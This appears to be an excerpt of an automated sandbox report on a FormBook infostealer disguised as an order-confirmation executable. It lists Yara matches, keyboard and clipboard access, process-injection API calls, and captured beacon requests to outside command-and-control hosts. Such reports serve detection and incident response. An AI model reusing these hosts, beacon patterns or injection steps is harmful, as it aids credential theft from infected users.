          Source: global traffic | HTTP traffic detected: GET /bnuw/?Mv0h=ilxBzx5jzN5hMHP3lEnoWOla5UnSCnIEyVz4htafUXtg/D1GhDNvtcAOSSVsQdsK+0zz&VPXh=GhIH HTTP/1.1 | Host: www.swiftappliancessc.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /bnuw/?Mv0h=UaN922MvMgW8WO4gu4dCtZfuQaKmG0MLXVbxDGTLVk691LjZJH+3nMRa/tXw417tQlSj&VPXh=GhIH HTTP/1.1 | Host: www.state728.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
          Source: unknown | DNS traffic detected: queries for: www.coredigit.net
          Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Wed, 27 Jan 2021 14:40:57 GMT | Content-Type: text/html | Content-Length: 1039 | Connection: close | Vary: Accept-Encoding | Last-Modified: Tue, 24 Feb 2015 16:29:52 GMT | ETag: "40f-50fd8074406b0" | Accept-Ranges: bytes | Data Raw: 3c 48 54 4d 4c 3e 0a 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0a 3c 42 41 53 45 20 68 72 65 66 3d 22 2f 65 72 72 6f 72 5f 64 6f 63 73 2f 22 3e 3c 21 2d 2d 5b 69 66 20 6c 74 65 20 49 45 20 36 5d 3e 3c 2f 42 41 53 45 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 0a 3c 48 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 64 6f 63 75 6d 65 6e 74 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 0a 3c 50 3e 0a 3c 48 52 3e 0a 3c 41 44 44 52 45 53 53 3e 0a 57 65 62 20 53 65 72 76 65 72 20 61 74 20 77 65 62 31 32 32 2e 73 65 72 76 65 72 30 31 2e 66 72 75 69 74 6d 65 64 69 61 2e 64 65 0a 3c 2f 41 44 44 52 45 53 53 3e 0a 3c 2f 42 4f 44 59 3e 0a 3c 2f 48 54 4d 4c 3e 0a 0a 3c 21 2d 2d 0a 20 20 20 2d 20 55 6e 66 6f 72 74 75 6e 61 74 65 6c 79 2c 20 4d 69 63 72 6f 73 6f 66 74 20 68 61 73 20 61 64 64 65 64 20 61 20 63 6c 65 76 65 72 20 6e 65 77 0a 20 20 20 2d 20 22 66 65 61 74 75 72 65 22 20 74 6f 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 2e 20 49 66 20 74 68 65 20 74 65 78 74 20 6f 66 0a 20 20 20 2d 20 61 6e 20 65 72 72 6f 72 27 73 20 6d 65 73 73 61 67 65 20 69 73 20 22 74 6f 6f 20 73 6d 61 6c 6c 22 2c 20 73 70 65 63 69 66 69 63 61 6c 6c 79 0a 20 20 20 2d 20 6c 65 73 73 20 74 68 61 6e 20 35 31 32 20 62 79 74 65 73 2c 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 20 72 65 74 75 72 6e 73 0a 20 20 20 2d 20 69 74 73 20 6f 77 6e 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 2e 20 59 6f 75 20 63 61 6e 20 74 75 72 6e 20 74 68 61 74 20 6f 66 66 2c 0a 20 20 20 2d 20 62 75 74 20 69 74 27 73 20 70 72 65 74 74 79 20 74 72 69 63 6b 79 20 74 6f 20 66 69 6e 64 20 73 77 69 74 63 68 20 63 61 6c 6c 65 64 0a 20 20 20 2d 20 22 73 6d 61 72 74 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 22 2e 20 54 68 61 74 20 6d 65 61 6e 73 2c 20 6f 66 20 63 6f 75 72 73 65 2c 0a 20 20 20 2d 20 74 68 61 74 20 73 68 6f 72 74 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 20 61 72 65 20 63 65 6e 73 6f 72 65 64 20 62 79 20 64 65 66 61 75 6c 74 2e 0a 20 20 20 2d 20 49 49 53 20 61 6c 77 61 79 73 20 72 65 74 75 72 6e 73 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 20 74 68 61 74 20 61 72 65 20 6c 6f 6e 67 0a 20 20 20 2d 20 65 6e 6f 75 67 68 20 74 6f 20 6d 61 6b 65 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 20 68 61 70 70 79 2e 20 54 68 65 0a 20 20 20 2d 20 77 6f 72 6b 61 72 6f 75 6e 64 20 69 73 20 70 72 65 74 74 79 20 73 69 6d 70 6c 65 3a 20 70 61 64 20 74 68 65 20 65 72 72 6f 72 0a 20 20 20 2d 20 6d 65 73 73 61 67 65 20 77 69 74 68 20 61 20 62 69 67 20 63 6f 6d 6d 65 6e 74 20 6c 69 6b 65 20 74 68 69 73 20 74 6f 20 70 75 73 68 20 69
          Source: Order confirmation 64236000000025 26.01.2021.exe, 00000000.00000002.259983047.00000000027B2000.00000004.00000001.sdmp, lqqebhptsg.exe, 00000001.00000002.256308291.0000000004EB3000.00000004.00000001.sdmp, nsmE343.tmp.0.dr | String found in binary or memory: http://crl.globalsign.com/gs/gstimestampingsha2g2.crl0
          Source: Order confirmation 64236000000025 26.01.2021.exe, 00000000.00000002.259983047.00000000027B2000.00000004.00000001.sdmp, lqqebhptsg.exe, 00000001.00000002.256308291.0000000004EB3000.00000004.00000001.sdmp, nsmE343.tmp.0.dr | String found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
          Source: Order confirmation 64236000000025 26.01.2021.exe, 00000000.00000002.259983047.00000000027B2000.00000004.00000001.sdmp, lqqebhptsg.exe, 00000001.00000002.256308291.0000000004EB3000.00000004.00000001.sdmp, nsmE343.tmp.0.dr | String found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
          Source: Order confirmation 64236000000025 26.01.2021.exe, 00000000.00000002.259983047.00000000027B2000.00000004.00000001.sdmp, lqqebhptsg.exe, 00000001.00000002.256308291.0000000004EB3000.00000004.00000001.sdmp, nsmE343.tmp.0.dr | String found in binary or memory: http://crl.globalsign.net/root-r3.crl0
          Source: explorer.exe, 00000004.00000000.275348832.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://fontfabrik.com
          Source: Order confirmation 64236000000025 26.01.2021.exe | String found in binary or memory: http://nsis.sf.net/NSIS_Error
          Source: Order confirmation 64236000000025 26.01.2021.exe | String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: Order confirmation 64236000000025 26.01.2021.exe, 00000000.00000002.259983047.00000000027B2000.00000004.00000001.sdmp, lqqebhptsg.exe, 00000001.00000002.256308291.0000000004EB3000.00000004.00000001.sdmp, nsmE343.tmp.0.dr | String found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
          Source: Order confirmation 64236000000025 26.01.2021.exe, 00000000.00000002.259983047.00000000027B2000.00000004.00000001.sdmp, lqqebhptsg.exe, 00000001.00000002.256308291.0000000004EB3000.00000004.00000001.sdmp, nsmE343.tmp.0.dr | String found in binary or memory: http://ocsp2.globalsign.com/gstimestampingsha2g20
          Source: Order confirmation 64236000000025 26.01.2021.exe, 00000000.00000002.259983047.00000000027B2000.00000004.00000001.sdmp, lqqebhptsg.exe, 00000001.00000002.256308291.0000000004EB3000.00000004.00000001.sdmp, nsmE343.tmp.0.dr | String found in binary or memory: http://ocsp2.globalsign.com/rootr306
          Source: Order confirmation 64236000000025 26.01.2021.exe, 00000000.00000002.259983047.00000000027B2000.00000004.00000001.sdmp, lqqebhptsg.exe, 00000001.00000002.256308291.0000000004EB3000.00000004.00000001.sdmp, nsmE343.tmp.0.dr | String found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
          Source: Order confirmation 64236000000025 26.01.2021.exe, 00000000.00000002.259983047.00000000027B2000.00000004.00000001.sdmp, lqqebhptsg.exe, 00000001.00000002.256308291.0000000004EB3000.00000004.00000001.sdmp, nsmE343.tmp.0.dr | String found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingsha2g2.crt0
          Source: explorer.exe, 00000004.00000000.275348832.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: Order confirmation 64236000000025 26.01.2021.exe, 00000000.00000002.259983047.00000000027B2000.00000004.00000001.sdmp, lqqebhptsg.exe, 00000001.00000002.251790831.0000000000BF9000.00000002.00020000.sdmp, 9rd1hxro.exe, 00000002.00000000.242920067.00000000004C9000.00000002.00020000.sdmp, NETSTAT.EXE, 0000000C.00000002.628385609.0000000003B1B000.00000004.00000001.sdmp, 9rd1hxro.exe.1.dr | String found in binary or memory: http://www.autoitscript.com/autoit3/J
          Source: explorer.exe, 00000004.00000000.275348832.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000004.00000000.275348832.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000004.00000000.275348832.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000004.00000000.275348832.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000004.00000000.275348832.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 00000004.00000000.275348832.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: explorer.exe, 00000004.00000000.275348832.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 00000004.00000000.275348832.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 00000004.00000000.275348832.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 00000004.00000000.275348832.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000004.00000000.275348832.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000004.00000000.275348832.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000004.00000000.275348832.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 00000004.00000000.275348832.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 00000004.00000000.275348832.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000004.00000000.275348832.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000004.00000000.275348832.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000004.00000000.275348832.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000004.00000000.275348832.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000004.00000000.275348832.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.sandoll.co.kr
          Source: NETSTAT.EXE, 0000000C.00000002.628447437.0000000003BD2000.00000004.00000001.sdmp | String found in binary or memory: http://www.secretlairtoys.com/
          Source: explorer.exe, 00000004.00000000.275348832.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000004.00000000.275348832.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000004.00000000.275348832.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000004.00000000.275348832.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn
          Source: NETSTAT.EXE, 0000000C.00000002.628447437.0000000003BD2000.00000004.00000001.sdmp | String found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/drift-zoom/1.4.0/drift-basic.min.css
          Source: NETSTAT.EXE, 0000000C.00000002.628447437.0000000003BD2000.00000004.00000001.sdmp | String found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/lightgallery/1.7.3/css/lightgallery.min.css
          Source: NETSTAT.EXE, 0000000C.00000002.628447437.0000000003BD2000.00000004.00000001.sdmp | String found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/noUiSlider/14.6.1/nouislider.min.css
          Source: NETSTAT.EXE, 0000000C.00000002.628447437.0000000003BD2000.00000004.00000001.sdmp | String found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/simplebar/2.5.0/simplebar.min.css
          Source: NETSTAT.EXE, 0000000C.00000002.628447437.0000000003BD2000.00000004.00000001.sdmp | String found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/tiny-slider/2.9.2/tiny-slider.css
          Source: Order confirmation 64236000000025 26.01.2021.exe, 00000000.00000002.259983047.00000000027B2000.00000004.00000001.sdmp, lqqebhptsg.exe, 00000001.00000002.256308291.0000000004EB3000.00000004.00000001.sdmp, nsmE343.tmp.0.dr | String found in binary or memory: https://www.autoitscript.com/autoit3/
          Source: NETSTAT.EXE, 0000000C.00000002.628447437.0000000003BD2000.00000004.00000001.sdmp | String found in binary or memory: https://www.brendonellis.com/bnuw/?Mv0h=QSs7jQDeFsICiQBBJT3dneCSujMK1kRtf3DX2CBTXjaAl0pqu
          Source: NETSTAT.EXE, 0000000C.00000002.628447437.0000000003BD2000.00000004.00000001.sdmp | String found in binary or memory: https://www.expand.care/bnuw/?Mv0h=9icL5DbtPB2as1Zd6Xg9EreNcG85hnBQd3Q23kTehbS
          Source: nsmE343.tmp.0.dr | String found in binary or memory: https://www.globalsign.com/repository/0
          Source: Order confirmation 64236000000025 26.01.2021.exe, 00000000.00000002.259983047.00000000027B2000.00000004.00000001.sdmp, lqqebhptsg.exe, 00000001.00000002.256308291.0000000004EB3000.00000004.00000001.sdmp, nsmE343.tmp.0.dr | String found in binary or memory: https://www.globalsign.com/repository/06
          Source: C:\Users\user\Desktop\Order confirmation 64236000000025 26.01.2021.exe | Code function: 0_2_0040548D GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,
          Source: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exe | Code function: 1_2_00BA4632 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,
          Source: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exe | Code function: 1_2_00B90508 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,
          Source: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exe | Code function: 1_2_00BBD164 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,

          E-Banking Fraud:

          Yara detected FormBook
          Source: Yara match | File source: 00000001.00000002.256150994.0000000004DC0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000C.00000002.625191007.0000000000640000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000C.00000002.626416806.00000000032D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000002.291015607.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000002.291095768.00000000004B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000001.250721725.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000002.291143508.00000000008E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 1.2.lqqebhptsg.exe.4dc0000.1.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 2.2.9rd1hxro.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 2.1.9rd1hxro.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 1.2.lqqebhptsg.exe.4dc0000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 2.2.9rd1hxro.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 2.1.9rd1hxro.exe.400000.0.unpack, type: UNPACKEDPE

          System Summary:

          Malicious sample detected (through community Yara rule)
          Source: 00000001.00000002.256150994.0000000004DC0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.256150994.0000000004DC0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000C.00000002.625191007.0000000000640000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000C.00000002.625191007.0000000000640000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000C.00000002.626416806.00000000032D0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000C.00000002.626416806.00000000032D0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.291015607.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.291015607.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.291095768.00000000004B0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.291095768.00000000004B0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000001.250721725.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000001.250721725.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.291143508.00000000008E0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.291143508.00000000008E0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.lqqebhptsg.exe.4dc0000.1.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.lqqebhptsg.exe.4dc0000.1.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.9rd1hxro.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.9rd1hxro.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.1.9rd1hxro.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.1.9rd1hxro.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.lqqebhptsg.exe.4dc0000.1.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.lqqebhptsg.exe.4dc0000.1.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.9rd1hxro.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.9rd1hxro.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.1.9rd1hxro.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.1.9rd1hxro.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Initial sample is a PE file and has a suspicious name
          Source: initial sample | Static PE information: Filename: Order confirmation 64236000000025 26.01.2021.exe
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe | Code function: 2_2_004181B0 NtCreateFile,
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe | Code function: 2_2_00418260 NtReadFile,
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe | Code function: 2_2_004182E0 NtClose,
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe | Code function: 2_2_00418390 NtAllocateVirtualMemory,
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe | Code function: 2_2_004182DB NtClose,
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe | Code function: 2_2_0041838A NtAllocateVirtualMemory,
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe | Code function: 2_2_00E498F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe | Code function: 2_2_00E49860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe | Code function: 2_2_00E49840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe | Code function: 2_2_00E499A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe | Code function: 2_2_00E49910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe | Code function: 2_2_00E49A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe | Code function: 2_2_00E49A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe | Code function: 2_2_00E49A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe | Code function: 2_2_00E495D0 NtClose,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe | Code function: 2_2_00E49540 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe | Code function: 2_2_00E496E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe | Code function: 2_2_00E49660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe | Code function: 2_2_00E49FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe | Code function: 2_2_00E497A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe | Code function: 2_2_00E49780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe | Code function: 2_2_00E49710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe | Code function: 2_2_00E498A0 NtWriteVirtualMemory,
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe | Code function: 2_2_00E4B040 NtSuspendThread,
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe | Code function: 2_2_00E49820 NtEnumerateKey,
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe | Code function: 2_2_00E499D0 NtCreateProcessEx,
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe | Code function: 2_2_00E49950 NtQueueApcThread,
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe | Code function: 2_2_00E49A80 NtOpenDirectoryObject,
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe | Code function: 2_2_00E49A10 NtQuerySection,
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe | Code function: 2_2_00E4A3B0 NtGetContextThread,
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe | Code function: 2_2_00E49B00 NtSetValueKey,
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe | Code function: 2_2_00E495F0 NtQueryInformationFile,
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe | Code function: 2_2_00E49560 NtWriteFile,
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe | Code function: 2_2_00E49520 NtWaitForSingleObject,
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe | Code function: 2_2_00E4AD30 NtSetContextThread,
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe | Code function: 2_2_00E496D0 NtCreateKey,
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe | Code function: 2_2_00E49670 NtQueryInformationProcess,
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe | Code function: 2_2_00E49650 NtQueryValueKey,
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E49610 NtEnumerateValueKey,
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E49760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 12_2_032E8390 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 12_2_032E8260 NtReadFile,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 12_2_032E82E0 NtClose,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 12_2_032E81B0 NtCreateFile,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 12_2_032E838A NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 12_2_032E82DB NtClose,
          Source: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exe Code function: 1_2_00B942D5: CreateFileW,DeviceIoControl,CloseHandle,
          Source: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exe Code function: 1_2_00B88F2E _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,
